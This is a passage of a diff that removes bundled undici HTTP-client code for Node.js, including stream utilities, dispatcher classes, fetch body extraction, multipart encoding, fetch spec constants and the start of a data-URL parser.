'function') { - throw new InvalidArgumentError('invalid onConnect method') - } - - if (typeof handler.onError !== 'function') { - throw new InvalidArgumentError('invalid onError method') - } - - if (typeof handler.onBodySent !== 'function' && handler.onBodySent !== undefined) { - throw new InvalidArgumentError('invalid onBodySent method') - } - - if (upgrade || method === 'CONNECT') { - if (typeof handler.onUpgrade !== 'function') { - throw new InvalidArgumentError('invalid onUpgrade method') - } - } else { - if (typeof handler.onHeaders !== 'function') { - throw new InvalidArgumentError('invalid onHeaders method') - } - - if (typeof handler.onData !== 'function') { - throw new InvalidArgumentError('invalid onData method') - } - - if (typeof handler.onComplete !== 'function') { - throw new InvalidArgumentError('invalid onComplete method') - } - } -} - -// A body is disturbed if it has been read from and it cannot -// be re-used without losing state or data. -function isDisturbed (body) { - return !!(body && ( - stream.isDisturbed - ? stream.isDisturbed(body) || body[kBodyUsed] // TODO (fix): Why is body[kBodyUsed] needed? - : body[kBodyUsed] || - body.readableDidRead || - (body._readableState && body._readableState.dataEmitted) || - isReadableAborted(body) - )) -} - -function isErrored (body) { - return !!(body && ( - stream.isErrored - ? stream.isErrored(body) - : /state: 'errored'/.test(nodeUtil.inspect(body) - ))) -} - -function isReadable (body) { - return !!(body && ( - stream.isReadable - ? 
stream.isReadable(body) - : /state: 'readable'/.test(nodeUtil.inspect(body) - ))) -} - -function getSocketInfo (socket) { - return { - localAddress: socket.localAddress, - localPort: socket.localPort, - remoteAddress: socket.remoteAddress, - remotePort: socket.remotePort, - remoteFamily: socket.remoteFamily, - timeout: socket.timeout, - bytesWritten: socket.bytesWritten, - bytesRead: socket.bytesRead - } -} - -async function * convertIterableToBuffer (iterable) { - for await (const chunk of iterable) { - yield Buffer.isBuffer(chunk) ? chunk : Buffer.from(chunk) - } -} - -let ReadableStream -function ReadableStreamFrom (iterable) { - if (!ReadableStream) { - ReadableStream = (__nccwpck_require__(5356).ReadableStream) - } - - if (ReadableStream.from) { - return ReadableStream.from(convertIterableToBuffer(iterable)) - } - - let iterator - return new ReadableStream( - { - async start () { - iterator = iterable[Symbol.asyncIterator]() - }, - async pull (controller) { - const { done, value } = await iterator.next() - if (done) { - queueMicrotask(() => { - controller.close() - }) - } else { - const buf = Buffer.isBuffer(value) ? value : Buffer.from(value) - controller.enqueue(new Uint8Array(buf)) - } - return controller.desiredSize > 0 - }, - async cancel (reason) { - await iterator.return() - } - }, - 0 - ) -} - -// The chunk should be a FormData instance and contains -// all the required methods. 
-function isFormDataLike (object) { - return ( - object && - typeof object === 'object' && - typeof object.append === 'function' && - typeof object.delete === 'function' && - typeof object.get === 'function' && - typeof object.getAll === 'function' && - typeof object.has === 'function' && - typeof object.set === 'function' && - object[Symbol.toStringTag] === 'FormData' - ) -} - -function throwIfAborted (signal) { - if (!signal) { return } - if (typeof signal.throwIfAborted === 'function') { - signal.throwIfAborted() - } else { - if (signal.aborted) { - // DOMException not available < v17.0.0 - const err = new Error('The operation was aborted') - err.name = 'AbortError' - throw err - } - } -} - -function addAbortListener (signal, listener) { - if ('addEventListener' in signal) { - signal.addEventListener('abort', listener, { once: true }) - return () => signal.removeEventListener('abort', listener) - } - signal.addListener('abort', listener) - return () => signal.removeListener('abort', listener) -} - -const hasToWellFormed = !!String.prototype.toWellFormed - -/** - * @param {string} val - */ -function toUSVString (val) { - if (hasToWellFormed) { - return `${val}`.toWellFormed() - } else if (nodeUtil.toUSVString) { - return nodeUtil.toUSVString(val) - } - - return `${val}` -} - -// Parsed accordingly to RFC 9110 -// https://www.rfc-editor.org/rfc/rfc9110#field.content-range -function parseRangeHeader (range) { - if (range == null || range === '') return { start: 0, end: null, size: null } - - const m = range ? range.match(/^bytes (\d+)-(\d+)\/(\d+)?$/) : null - return m - ? { - start: parseInt(m[1]), - end: m[2] ? parseInt(m[2]) : null, - size: m[3] ? 
parseInt(m[3]) : null - } - : null -} - -const kEnumerableProperty = Object.create(null) -kEnumerableProperty.enumerable = true - -module.exports = { - kEnumerableProperty, - nop, - isDisturbed, - isErrored, - isReadable, - toUSVString, - isReadableAborted, - isBlobLike, - parseOrigin, - parseURL, - getServerName, - isStream, - isIterable, - isAsyncIterable, - isDestroyed, - parseRawHeaders, - parseHeaders, - parseKeepAliveTimeout, - destroy, - bodyLength, - deepClone, - ReadableStreamFrom, - isBuffer, - validateHandler, - getSocketInfo, - isFormDataLike, - buildURL, - throwIfAborted, - addAbortListener, - parseRangeHeader, - nodeMajor, - nodeMinor, - nodeHasAutoSelectFamily: nodeMajor > 18 || (nodeMajor === 18 && nodeMinor >= 13), - safeHTTPMethods: ['GET', 'HEAD', 'OPTIONS', 'TRACE'] -} - - -/***/ }), - -/***/ 4839: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Dispatcher = __nccwpck_require__(412) -const { - ClientDestroyedError, - ClientClosedError, - InvalidArgumentError -} = __nccwpck_require__(8045) -const { kDestroy, kClose, kDispatch, kInterceptors } = __nccwpck_require__(2785) - -const kDestroyed = Symbol('destroyed') -const kClosed = Symbol('closed') -const kOnDestroyed = Symbol('onDestroyed') -const kOnClosed = Symbol('onClosed') -const kInterceptedDispatch = Symbol('Intercepted Dispatch') - -class DispatcherBase extends Dispatcher { - constructor () { - super() - - this[kDestroyed] = false - this[kOnDestroyed] = null - this[kClosed] = false - this[kOnClosed] = [] - } - - get destroyed () { - return this[kDestroyed] - } - - get closed () { - return this[kClosed] - } - - get interceptors () { - return this[kInterceptors] - } - - set interceptors (newInterceptors) { - if (newInterceptors) { - for (let i = newInterceptors.length - 1; i >= 0; i--) { - const interceptor = this[kInterceptors][i] - if (typeof interceptor !== 'function') { - throw new InvalidArgumentError('interceptor must be an function') - } 
- } - } - - this[kInterceptors] = newInterceptors - } - - close (callback) { - if (callback === undefined) { - return new Promise((resolve, reject) => { - this.close((err, data) => { - return err ? reject(err) : resolve(data) - }) - }) - } - - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - if (this[kDestroyed]) { - queueMicrotask(() => callback(new ClientDestroyedError(), null)) - return - } - - if (this[kClosed]) { - if (this[kOnClosed]) { - this[kOnClosed].push(callback) - } else { - queueMicrotask(() => callback(null, null)) - } - return - } - - this[kClosed] = true - this[kOnClosed].push(callback) - - const onClosed = () => { - const callbacks = this[kOnClosed] - this[kOnClosed] = null - for (let i = 0; i < callbacks.length; i++) { - callbacks[i](null, null) - } - } - - // Should not error. - this[kClose]() - .then(() => this.destroy()) - .then(() => { - queueMicrotask(onClosed) - }) - } - - destroy (err, callback) { - if (typeof err === 'function') { - callback = err - err = null - } - - if (callback === undefined) { - return new Promise((resolve, reject) => { - this.destroy(err, (err, data) => { - return err ? /* istanbul ignore next: should never error */ reject(err) : resolve(data) - }) - }) - } - - if (typeof callback !== 'function') { - throw new InvalidArgumentError('invalid callback') - } - - if (this[kDestroyed]) { - if (this[kOnDestroyed]) { - this[kOnDestroyed].push(callback) - } else { - queueMicrotask(() => callback(null, null)) - } - return - } - - if (!err) { - err = new ClientDestroyedError() - } - - this[kDestroyed] = true - this[kOnDestroyed] = this[kOnDestroyed] || [] - this[kOnDestroyed].push(callback) - - const onDestroyed = () => { - const callbacks = this[kOnDestroyed] - this[kOnDestroyed] = null - for (let i = 0; i < callbacks.length; i++) { - callbacks[i](null, null) - } - } - - // Should not error. 
- this[kDestroy](err).then(() => { - queueMicrotask(onDestroyed) - }) - } - - [kInterceptedDispatch] (opts, handler) { - if (!this[kInterceptors] || this[kInterceptors].length === 0) { - this[kInterceptedDispatch] = this[kDispatch] - return this[kDispatch](opts, handler) - } - - let dispatch = this[kDispatch].bind(this) - for (let i = this[kInterceptors].length - 1; i >= 0; i--) { - dispatch = this[kInterceptors][i](dispatch) - } - this[kInterceptedDispatch] = dispatch - return dispatch(opts, handler) - } - - dispatch (opts, handler) { - if (!handler || typeof handler !== 'object') { - throw new InvalidArgumentError('handler must be an object') - } - - try { - if (!opts || typeof opts !== 'object') { - throw new InvalidArgumentError('opts must be an object.') - } - - if (this[kDestroyed] || this[kOnDestroyed]) { - throw new ClientDestroyedError() - } - - if (this[kClosed]) { - throw new ClientClosedError() - } - - return this[kInterceptedDispatch](opts, handler) - } catch (err) { - if (typeof handler.onError !== 'function') { - throw new InvalidArgumentError('invalid onError method') - } - - handler.onError(err) - - return false - } - } -} - -module.exports = DispatcherBase - - -/***/ }), - -/***/ 412: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const EventEmitter = __nccwpck_require__(2361) - -class Dispatcher extends EventEmitter { - dispatch () { - throw new Error('not implemented') - } - - close () { - throw new Error('not implemented') - } - - destroy () { - throw new Error('not implemented') - } -} - -module.exports = Dispatcher - - -/***/ }), - -/***/ 1472: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const Busboy = __nccwpck_require__(727) -const util = __nccwpck_require__(3983) -const { - ReadableStreamFrom, - isBlobLike, - isReadableStreamLike, - readableStreamClose, - createDeferredPromise, - fullyReadBody -} = __nccwpck_require__(2538) -const { FormData } = 
__nccwpck_require__(2015) -const { kState } = __nccwpck_require__(5861) -const { webidl } = __nccwpck_require__(1744) -const { DOMException, structuredClone } = __nccwpck_require__(1037) -const { Blob, File: NativeFile } = __nccwpck_require__(4300) -const { kBodyUsed } = __nccwpck_require__(2785) -const assert = __nccwpck_require__(9491) -const { isErrored } = __nccwpck_require__(3983) -const { isUint8Array, isArrayBuffer } = __nccwpck_require__(9830) -const { File: UndiciFile } = __nccwpck_require__(8511) -const { parseMIMEType, serializeAMimeType } = __nccwpck_require__(685) - -let ReadableStream = globalThis.ReadableStream - -/** @type {globalThis['File']} */ -const File = NativeFile ?? UndiciFile -const textEncoder = new TextEncoder() -const textDecoder = new TextDecoder() - -// https://fetch.spec.whatwg.org/#concept-bodyinit-extract -function extractBody (object, keepalive = false) { - if (!ReadableStream) { - ReadableStream = (__nccwpck_require__(5356).ReadableStream) - } - - // 1. Let stream be null. - let stream = null - - // 2. If object is a ReadableStream object, then set stream to object. - if (object instanceof ReadableStream) { - stream = object - } else if (isBlobLike(object)) { - // 3. Otherwise, if object is a Blob object, set stream to the - // result of running object’s get stream. - stream = object.stream() - } else { - // 4. Otherwise, set stream to a new ReadableStream object, and set - // up stream. - stream = new ReadableStream({ - async pull (controller) { - controller.enqueue( - typeof source === 'string' ? textEncoder.encode(source) : source - ) - queueMicrotask(() => readableStreamClose(controller)) - }, - start () {}, - type: undefined - }) - } - - // 5. Assert: stream is a ReadableStream object. - assert(isReadableStreamLike(stream)) - - // 6. Let action be null. - let action = null - - // 7. Let source be null. - let source = null - - // 8. Let length be null. - let length = null - - // 9. Let type be null. 
- let type = null - - // 10. Switch on object: - if (typeof object === 'string') { - // Set source to the UTF-8 encoding of object. - // Note: setting source to a Uint8Array here breaks some mocking assumptions. - source = object - - // Set type to `text/plain;charset=UTF-8`. - type = 'text/plain;charset=UTF-8' - } else if (object instanceof URLSearchParams) { - // URLSearchParams - - // spec says to run application/x-www-form-urlencoded on body.list - // this is implemented in Node.js as apart of an URLSearchParams instance toString method - // See: https://github.com/nodejs/node/blob/e46c680bf2b211bbd52cf959ca17ee98c7f657f5/lib/internal/url.js#L490 - // and https://github.com/nodejs/node/blob/e46c680bf2b211bbd52cf959ca17ee98c7f657f5/lib/internal/url.js#L1100 - - // Set source to the result of running the application/x-www-form-urlencoded serializer with object’s list. - source = object.toString() - - // Set type to `application/x-www-form-urlencoded;charset=UTF-8`. - type = 'application/x-www-form-urlencoded;charset=UTF-8' - } else if (isArrayBuffer(object)) { - // BufferSource/ArrayBuffer - - // Set source to a copy of the bytes held by object. - source = new Uint8Array(object.slice()) - } else if (ArrayBuffer.isView(object)) { - // BufferSource/ArrayBufferView - - // Set source to a copy of the bytes held by object. - source = new Uint8Array(object.buffer.slice(object.byteOffset, object.byteOffset + object.byteLength)) - } else if (util.isFormDataLike(object)) { - const boundary = `----formdata-undici-0${`${Math.floor(Math.random() * 1e11)}`.padStart(11, '0')}` - const prefix = `--${boundary}\r\nContent-Disposition: form-data` - - /*! formdata-polyfill. MIT License. 
Jimmy Wärting */ - const escape = (str) => - str.replace(/\n/g, '%0A').replace(/\r/g, '%0D').replace(/"/g, '%22') - const normalizeLinefeeds = (value) => value.replace(/\r?\n|\r/g, '\r\n') - - // Set action to this step: run the multipart/form-data - // encoding algorithm, with object’s entry list and UTF-8. - // - This ensures that the body is immutable and can't be changed afterwords - // - That the content-length is calculated in advance. - // - And that all parts are pre-encoded and ready to be sent. - - const blobParts = [] - const rn = new Uint8Array([13, 10]) // '\r\n' - length = 0 - let hasUnknownSizeValue = false - - for (const [name, value] of object) { - if (typeof value === 'string') { - const chunk = textEncoder.encode(prefix + - `; name="${escape(normalizeLinefeeds(name))}"` + - `\r\n\r\n${normalizeLinefeeds(value)}\r\n`) - blobParts.push(chunk) - length += chunk.byteLength - } else { - const chunk = textEncoder.encode(`${prefix}; name="${escape(normalizeLinefeeds(name))}"` + - (value.name ? `; filename="${escape(value.name)}"` : '') + '\r\n' + - `Content-Type: ${ - value.type || 'application/octet-stream' - }\r\n\r\n`) - blobParts.push(chunk, value, rn) - if (typeof value.size === 'number') { - length += chunk.byteLength + value.size + rn.byteLength - } else { - hasUnknownSizeValue = true - } - } - } - - const chunk = textEncoder.encode(`--${boundary}--`) - blobParts.push(chunk) - length += chunk.byteLength - if (hasUnknownSizeValue) { - length = null - } - - // Set source to object. - source = object - - action = async function * () { - for (const part of blobParts) { - if (part.stream) { - yield * part.stream() - } else { - yield part - } - } - } - - // Set type to `multipart/form-data; boundary=`, - // followed by the multipart/form-data boundary string generated - // by the multipart/form-data encoding algorithm. - type = 'multipart/form-data; boundary=' + boundary - } else if (isBlobLike(object)) { - // Blob - - // Set source to object. 
- source = object - - // Set length to object’s size. - length = object.size - - // If object’s type attribute is not the empty byte sequence, set - // type to its value. - if (object.type) { - type = object.type - } - } else if (typeof object[Symbol.asyncIterator] === 'function') { - // If keepalive is true, then throw a TypeError. - if (keepalive) { - throw new TypeError('keepalive') - } - - // If object is disturbed or locked, then throw a TypeError. - if (util.isDisturbed(object) || object.locked) { - throw new TypeError( - 'Response body object should not be disturbed or locked' - ) - } - - stream = - object instanceof ReadableStream ? object : ReadableStreamFrom(object) - } - - // 11. If source is a byte sequence, then set action to a - // step that returns source and length to source’s length. - if (typeof source === 'string' || util.isBuffer(source)) { - length = Buffer.byteLength(source) - } - - // 12. If action is non-null, then run these steps in in parallel: - if (action != null) { - // Run action. - let iterator - stream = new ReadableStream({ - async start () { - iterator = action(object)[Symbol.asyncIterator]() - }, - async pull (controller) { - const { value, done } = await iterator.next() - if (done) { - // When running action is done, close stream. - queueMicrotask(() => { - controller.close() - }) - } else { - // Whenever one or more bytes are available and stream is not errored, - // enqueue a Uint8Array wrapping an ArrayBuffer containing the available - // bytes into stream. - if (!isErrored(stream)) { - controller.enqueue(new Uint8Array(value)) - } - } - return controller.desiredSize > 0 - }, - async cancel (reason) { - await iterator.return() - }, - type: undefined - }) - } - - // 13. Let body be a body whose stream is stream, source is source, - // and length is length. - const body = { stream, source, length } - - // 14. Return (body, type). 
- return [body, type] -} - -// https://fetch.spec.whatwg.org/#bodyinit-safely-extract -function safelyExtractBody (object, keepalive = false) { - if (!ReadableStream) { - // istanbul ignore next - ReadableStream = (__nccwpck_require__(5356).ReadableStream) - } - - // To safely extract a body and a `Content-Type` value from - // a byte sequence or BodyInit object object, run these steps: - - // 1. If object is a ReadableStream object, then: - if (object instanceof ReadableStream) { - // Assert: object is neither disturbed nor locked. - // istanbul ignore next - assert(!util.isDisturbed(object), 'The body has already been consumed.') - // istanbul ignore next - assert(!object.locked, 'The stream is locked.') - } - - // 2. Return the results of extracting object. - return extractBody(object, keepalive) -} - -function cloneBody (body) { - // To clone a body body, run these steps: - - // https://fetch.spec.whatwg.org/#concept-body-clone - - // 1. Let « out1, out2 » be the result of teeing body’s stream. - const [out1, out2] = body.stream.tee() - const out2Clone = structuredClone(out2, { transfer: [out2] }) - // This, for whatever reasons, unrefs out2Clone which allows - // the process to exit by itself. - const [, finalClone] = out2Clone.tee() - - // 2. Set body’s stream to out1. - body.stream = out1 - - // 3. Return a body whose stream is out2 and other members are copied from body. - return { - stream: finalClone, - length: body.length, - source: body.source - } -} - -async function * consumeBody (body) { - if (body) { - if (isUint8Array(body)) { - yield body - } else { - const stream = body.stream - - if (util.isDisturbed(stream)) { - throw new TypeError('The body has already been consumed.') - } - - if (stream.locked) { - throw new TypeError('The stream is locked.') - } - - // Compat. 
- stream[kBodyUsed] = true - - yield * stream - } - } -} - -function throwIfAborted (state) { - if (state.aborted) { - throw new DOMException('The operation was aborted.', 'AbortError') - } -} - -function bodyMixinMethods (instance) { - const methods = { - blob () { - // The blob() method steps are to return the result of - // running consume body with this and the following step - // given a byte sequence bytes: return a Blob whose - // contents are bytes and whose type attribute is this’s - // MIME type. - return specConsumeBody(this, (bytes) => { - let mimeType = bodyMimeType(this) - - if (mimeType === 'failure') { - mimeType = '' - } else if (mimeType) { - mimeType = serializeAMimeType(mimeType) - } - - // Return a Blob whose contents are bytes and type attribute - // is mimeType. - return new Blob([bytes], { type: mimeType }) - }, instance) - }, - - arrayBuffer () { - // The arrayBuffer() method steps are to return the result - // of running consume body with this and the following step - // given a byte sequence bytes: return a new ArrayBuffer - // whose contents are bytes. - return specConsumeBody(this, (bytes) => { - return new Uint8Array(bytes).buffer - }, instance) - }, - - text () { - // The text() method steps are to return the result of running - // consume body with this and UTF-8 decode. - return specConsumeBody(this, utf8DecodeBytes, instance) - }, - - json () { - // The json() method steps are to return the result of running - // consume body with this and parse JSON from bytes. 
- return specConsumeBody(this, parseJSONFromBytes, instance) - }, - - async formData () { - webidl.brandCheck(this, instance) - - throwIfAborted(this[kState]) - - const contentType = this.headers.get('Content-Type') - - // If mimeType’s essence is "multipart/form-data", then: - if (/multipart\/form-data/.test(contentType)) { - const headers = {} - for (const [key, value] of this.headers) headers[key.toLowerCase()] = value - - const responseFormData = new FormData() - - let busboy - - try { - busboy = new Busboy({ - headers, - preservePath: true - }) - } catch (err) { - throw new DOMException(`${err}`, 'AbortError') - } - - busboy.on('field', (name, value) => { - responseFormData.append(name, value) - }) - busboy.on('file', (name, value, filename, encoding, mimeType) => { - const chunks = [] - - if (encoding === 'base64' || encoding.toLowerCase() === 'base64') { - let base64chunk = '' - - value.on('data', (chunk) => { - base64chunk += chunk.toString().replace(/[\r\n]/gm, '') - - const end = base64chunk.length - base64chunk.length % 4 - chunks.push(Buffer.from(base64chunk.slice(0, end), 'base64')) - - base64chunk = base64chunk.slice(end) - }) - value.on('end', () => { - chunks.push(Buffer.from(base64chunk, 'base64')) - responseFormData.append(name, new File(chunks, filename, { type: mimeType })) - }) - } else { - value.on('data', (chunk) => { - chunks.push(chunk) - }) - value.on('end', () => { - responseFormData.append(name, new File(chunks, filename, { type: mimeType })) - }) - } - }) - - const busboyResolve = new Promise((resolve, reject) => { - busboy.on('finish', resolve) - busboy.on('error', (err) => reject(new TypeError(err))) - }) - - if (this.body !== null) for await (const chunk of consumeBody(this[kState].body)) busboy.write(chunk) - busboy.end() - await busboyResolve - - return responseFormData - } else if (/application\/x-www-form-urlencoded/.test(contentType)) { - // Otherwise, if mimeType’s essence is "application/x-www-form-urlencoded", then: - - // 1. 
Let entries be the result of parsing bytes. - let entries - try { - let text = '' - // application/x-www-form-urlencoded parser will keep the BOM. - // https://url.spec.whatwg.org/#concept-urlencoded-parser - // Note that streaming decoder is stateful and cannot be reused - const streamingDecoder = new TextDecoder('utf-8', { ignoreBOM: true }) - - for await (const chunk of consumeBody(this[kState].body)) { - if (!isUint8Array(chunk)) { - throw new TypeError('Expected Uint8Array chunk') - } - text += streamingDecoder.decode(chunk, { stream: true }) - } - text += streamingDecoder.decode() - entries = new URLSearchParams(text) - } catch (err) { - // istanbul ignore next: Unclear when new URLSearchParams can fail on a string. - // 2. If entries is failure, then throw a TypeError. - throw Object.assign(new TypeError(), { cause: err }) - } - - // 3. Return a new FormData object whose entries are entries. - const formData = new FormData() - for (const [name, value] of entries) { - formData.append(name, value) - } - return formData - } else { - // Wait a tick before checking if the request has been aborted. - // Otherwise, a TypeError can be thrown when an AbortError should. - await Promise.resolve() - - throwIfAborted(this[kState]) - - // Otherwise, throw a TypeError. - throw webidl.errors.exception({ - header: `${instance.name}.formData`, - message: 'Could not parse content as FormData.' - }) - } - } - } - - return methods -} - -function mixinBody (prototype) { - Object.assign(prototype.prototype, bodyMixinMethods(prototype)) -} - -/** - * @see https://fetch.spec.whatwg.org/#concept-body-consume-body - * @param {Response|Request} object - * @param {(value: unknown) => unknown} convertBytesToJSValue - * @param {Response|Request} instance - */ -async function specConsumeBody (object, convertBytesToJSValue, instance) { - webidl.brandCheck(object, instance) - - throwIfAborted(object[kState]) - - // 1. 
If object is unusable, then return a promise rejected - // with a TypeError. - if (bodyUnusable(object[kState].body)) { - throw new TypeError('Body is unusable') - } - - // 2. Let promise be a new promise. - const promise = createDeferredPromise() - - // 3. Let errorSteps given error be to reject promise with error. - const errorSteps = (error) => promise.reject(error) - - // 4. Let successSteps given a byte sequence data be to resolve - // promise with the result of running convertBytesToJSValue - // with data. If that threw an exception, then run errorSteps - // with that exception. - const successSteps = (data) => { - try { - promise.resolve(convertBytesToJSValue(data)) - } catch (e) { - errorSteps(e) - } - } - - // 5. If object’s body is null, then run successSteps with an - // empty byte sequence. - if (object[kState].body == null) { - successSteps(new Uint8Array()) - return promise.promise - } - - // 6. Otherwise, fully read object’s body given successSteps, - // errorSteps, and object’s relevant global object. - await fullyReadBody(object[kState].body, successSteps, errorSteps) - - // 7. Return promise. - return promise.promise -} - -// https://fetch.spec.whatwg.org/#body-unusable -function bodyUnusable (body) { - // An object including the Body interface mixin is - // said to be unusable if its body is non-null and - // its body’s stream is disturbed or locked. - return body != null && (body.stream.locked || util.isDisturbed(body.stream)) -} - -/** - * @see https://encoding.spec.whatwg.org/#utf-8-decode - * @param {Buffer} buffer - */ -function utf8DecodeBytes (buffer) { - if (buffer.length === 0) { - return '' - } - - // 1. Let buffer be the result of peeking three bytes from - // ioQueue, converted to a byte sequence. - - // 2. If buffer is 0xEF 0xBB 0xBF, then read three - // bytes from ioQueue. (Do nothing with those bytes.) - if (buffer[0] === 0xEF && buffer[1] === 0xBB && buffer[2] === 0xBF) { - buffer = buffer.subarray(3) - } - - // 3. 
Process a queue with an instance of UTF-8’s - // decoder, ioQueue, output, and "replacement". - const output = textDecoder.decode(buffer) - - // 4. Return output. - return output -} - -/** - * @see https://infra.spec.whatwg.org/#parse-json-bytes-to-a-javascript-value - * @param {Uint8Array} bytes - */ -function parseJSONFromBytes (bytes) { - return JSON.parse(utf8DecodeBytes(bytes)) -} - -/** - * @see https://fetch.spec.whatwg.org/#concept-body-mime-type - * @param {import('./response').Response|import('./request').Request} object - */ -function bodyMimeType (object) { - const { headersList } = object[kState] - const contentType = headersList.get('content-type') - - if (contentType === null) { - return 'failure' - } - - return parseMIMEType(contentType) -} - -module.exports = { - extractBody, - safelyExtractBody, - cloneBody, - mixinBody -} - - -/***/ }), - -/***/ 1037: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { MessageChannel, receiveMessageOnPort } = __nccwpck_require__(1267) - -const corsSafeListedMethods = ['GET', 'HEAD', 'POST'] -const corsSafeListedMethodsSet = new Set(corsSafeListedMethods) - -const nullBodyStatus = [101, 204, 205, 304] - -const redirectStatus = [301, 302, 303, 307, 308] -const redirectStatusSet = new Set(redirectStatus) - -// https://fetch.spec.whatwg.org/#block-bad-port -const badPorts = [ - '1', '7', '9', '11', '13', '15', '17', '19', '20', '21', '22', '23', '25', '37', '42', '43', '53', '69', '77', '79', - '87', '95', '101', '102', '103', '104', '109', '110', '111', '113', '115', '117', '119', '123', '135', '137', - '139', '143', '161', '179', '389', '427', '465', '512', '513', '514', '515', '526', '530', '531', '532', - '540', '548', '554', '556', '563', '587', '601', '636', '989', '990', '993', '995', '1719', '1720', '1723', - '2049', '3659', '4045', '5060', '5061', '6000', '6566', '6665', '6666', '6667', '6668', '6669', '6697', - '10080' -] - -const badPortsSet = new 
Set(badPorts) - -// https://w3c.github.io/webappsec-referrer-policy/#referrer-policies -const referrerPolicy = [ - '', - 'no-referrer', - 'no-referrer-when-downgrade', - 'same-origin', - 'origin', - 'strict-origin', - 'origin-when-cross-origin', - 'strict-origin-when-cross-origin', - 'unsafe-url' -] -const referrerPolicySet = new Set(referrerPolicy) - -const requestRedirect = ['follow', 'manual', 'error'] - -const safeMethods = ['GET', 'HEAD', 'OPTIONS', 'TRACE'] -const safeMethodsSet = new Set(safeMethods) - -const requestMode = ['navigate', 'same-origin', 'no-cors', 'cors'] - -const requestCredentials = ['omit', 'same-origin', 'include'] - -const requestCache = [ - 'default', - 'no-store', - 'reload', - 'no-cache', - 'force-cache', - 'only-if-cached' -] - -// https://fetch.spec.whatwg.org/#request-body-header-name -const requestBodyHeader = [ - 'content-encoding', - 'content-language', - 'content-location', - 'content-type', - // See https://github.com/nodejs/undici/issues/2021 - // 'Content-Length' is a forbidden header name, which is typically - // removed in the Headers implementation. However, undici doesn't - // filter out headers, so we add it here. - 'content-length' -] - -// https://fetch.spec.whatwg.org/#enumdef-requestduplex -const requestDuplex = [ - 'half' -] - -// http://fetch.spec.whatwg.org/#forbidden-method -const forbiddenMethods = ['CONNECT', 'TRACE', 'TRACK'] -const forbiddenMethodsSet = new Set(forbiddenMethods) - -const subresource = [ - 'audio', - 'audioworklet', - 'font', - 'image', - 'manifest', - 'paintworklet', - 'script', - 'style', - 'track', - 'video', - 'xslt', - '' -] -const subresourceSet = new Set(subresource) - -/** @type {globalThis['DOMException']} */ -const DOMException = globalThis.DOMException ?? (() => { - // DOMException was only made a global in Node v17.0.0, - // but fetch supports >= v16.8. 
- try { - atob('~') - } catch (err) { - return Object.getPrototypeOf(err).constructor - } -})() - -let channel - -/** @type {globalThis['structuredClone']} */ -const structuredClone = - globalThis.structuredClone ?? - // https://github.com/nodejs/node/blob/b27ae24dcc4251bad726d9d84baf678d1f707fed/lib/internal/structured_clone.js - // structuredClone was added in v17.0.0, but fetch supports v16.8 - function structuredClone (value, options = undefined) { - if (arguments.length === 0) { - throw new TypeError('missing argument') - } - - if (!channel) { - channel = new MessageChannel() - } - channel.port1.unref() - channel.port2.unref() - channel.port1.postMessage(value, options?.transfer) - return receiveMessageOnPort(channel.port2).message - } - -module.exports = { - DOMException, - structuredClone, - subresource, - forbiddenMethods, - requestBodyHeader, - referrerPolicy, - requestRedirect, - requestMode, - requestCredentials, - requestCache, - redirectStatus, - corsSafeListedMethods, - nullBodyStatus, - safeMethods, - badPorts, - requestDuplex, - subresourceSet, - badPortsSet, - redirectStatusSet, - corsSafeListedMethodsSet, - safeMethodsSet, - forbiddenMethodsSet, - referrerPolicySet -} - - -/***/ }), - -/***/ 685: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -const assert = __nccwpck_require__(9491) -const { atob } = __nccwpck_require__(4300) -const { isomorphicDecode } = __nccwpck_require__(2538) - -const encoder = new TextEncoder() - -/** - * @see https://mimesniff.spec.whatwg.org/#http-token-code-point - */ -const HTTP_TOKEN_CODEPOINTS = /^[!#$%&'*+-.^_|~A-Za-z0-9]+$/ -const HTTP_WHITESPACE_REGEX = /(\u000A|\u000D|\u0009|\u0020)/ // eslint-disable-line -/** - * @see https://mimesniff.spec.whatwg.org/#http-quoted-string-token-code-point - */ -const HTTP_QUOTED_STRING_TOKENS = /[\u0009|\u0020-\u007E|\u0080-\u00FF]/ // eslint-disable-line - -// https://fetch.spec.whatwg.org/#data-url-processor -/** @param {URL} dataURL */ -function 
dataURLProcessor (dataURL) { - // 1. Assert: dataURL’s scheme is "data". - assert(dataURL.protocol === 'data:') - - // 2. Let input be the result of running the URL - // serializer on dataURL with exclude fragment - // set to true. - let input = URLSerializer(dataURL, true) - - // 3. Remove the leading "data:" string from input. - input = input.slice(5) - - // 4. Let position point at the start of input. - const position = { position: 0 } - - // 5. Let mimeType be the result of collecting a - // sequence of code points that are not equal - // to U+002C (,), given position. - let mimeType = collectASequenceOfCodePointsFast( - ',', - input, - position - ) - - // 6. Strip leading and trailing ASCII whitespace - // from mimeType. - // Undici implementation note: we need to store the - // length because if the mimetype has spaces removed, - // the wrong amount will be sliced from the input in - // step #9 - const mimeTypeLength = mimeType.length - mimeType = removeASCIIWhitespace(mimeType, true, true) - - // 7. If position is past the end of input, then - // return failure - if (position.position >= input.length) { - return 'failure' - } - - // 8. Advance position by 1. - position.position++ - - // 9. Let encodedBody be the remainder of input. - const encodedBody = input.slice(mimeTypeLength + 1) - - // 10. Let body be the percent-decoding of encodedBody. - let body = stringPercentDecode(encodedBody) - - // 11. If mimeType ends with U+003B (;), followed by - // zero or more U+0020 SPACE, followed by an ASCII - // case-insensitive match for "base64", then: - if (/;(\u0020){0,}base64$/i.test(mimeType)) { - // 1. Let stringBody be the isomorphic decode of body. - const stringBody = isomorphicDecode(body) - - // 2. Set body to the forgiving-base64 decode of - // stringBody. - body = forgivingBase64(stringBody) - - // 3. If body is failure, then return failure. - if (body === 'failure') { - return 'failure' - } - - // 4. Remove the last 6 code points from mimeType. 
